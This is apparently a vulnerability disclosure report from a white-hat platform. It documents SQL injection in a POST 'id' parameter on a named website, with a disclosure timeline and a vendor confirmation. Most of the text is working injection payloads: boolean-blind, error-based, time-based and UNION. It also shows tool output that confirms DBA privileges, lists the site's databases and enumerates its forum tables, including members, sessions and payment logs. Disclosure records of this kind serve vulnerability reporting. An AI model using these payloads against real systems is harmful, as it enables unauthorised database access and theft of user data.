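2015-05-15: Details reported to the vendor; awaiting vendor handling
2015-05-18: Vendor confirmed; details disclosed to the vendor only
2015-05-28: Details disclosed to core white hats and experts in related fields
2015-06-07: Details disclosed to regular white hats
2015-06-17: Details disclosed to trainee white hats
2015-07-02: Details disclosed to the public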
233
http://www.gd-linux.org/ajax.do?act=getinfo&oper=ProductAction
POST: id=1
Test payloads:
id=1 and 1=1
id=1 and 1=2
Confirmed that the issue exists.
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8531=8531

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 5190 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(5190=5190,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))iQgq)

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x71787a6271,0x706b5468446e6d567459,0x716b6a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: JSP
back-end DBMS: MySQL 5.0
current user is DBA: True
available databases [7]:
[*] discuz
[*] gdlcweb
[*] information_schema
[*] kbase
[*] mysql
[*] sampdb
[*] test

Database: discuz
[68 tables]
+---------------------+
| cdb_access          |
| cdb_activities      |
| cdb_activityapplies |
| cdb_adminactions    |
| cdb_admingroups     |
| cdb_adminnotes      |
| cdb_adminsessions   |
| cdb_advertisements  |
| cdb_announcements   |
| cdb_attachments     |
| cdb_attachtypes     |
| cdb_banned          |
| cdb_bbcodes         |
| cdb_blogcaches      |
| cdb_buddys          |
| cdb_creditslog      |
| cdb_crons           |
| cdb_failedlogins    |
| cdb_favorites       |
| cdb_forumfields     |
| cdb_forumlinks      |
| cdb_forums          |
| cdb_medals          |
| cdb_memberfields    |
| cdb_members         |
| cdb_moderators      |
| cdb_modworks        |
| cdb_myposts         |
| cdb_mythreads       |
| cdb_onlinelist      |
| cdb_onlinetime      |
| cdb_orders          |
| cdb_paymentlog      |
| cdb_pluginhooks     |
| cdb_plugins         |
| cdb_pluginvars      |
| cdb_pms             |
| cdb_pmsearchindex   |
| cdb_polloptions     |
| cdb_polls           |
| cdb_posts           |
| cdb_profilefields   |
| cdb_promotions      |
| cdb_pushedthreads   |
| cdb_ranks           |
| cdb_ratelog         |
| cdb_regips          |
| cdb_relatedthreads  |
| cdb_rewardlog       |
| cdb_rsscaches       |
| cdb_searchindex     |
| cdb_sessions        |
| cdb_settings        |
| cdb_smilies         |
| cdb_stats           |
| cdb_statvars        |
| cdb_styles          |
| cdb_stylevars       |
| cdb_subscriptions   |
| cdb_templates       |
| cdb_threads         |
| cdb_threadsmod      |
| cdb_threadtypes     |
| cdb_tradelog        |
| cdb_trades          |
| cdb_usergroups      |
| cdb_validating      |
| cdb_words           |
+---------------------+
~~
Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-05-18 08:39
Thanks, someone has already submitted this site previously.
None yet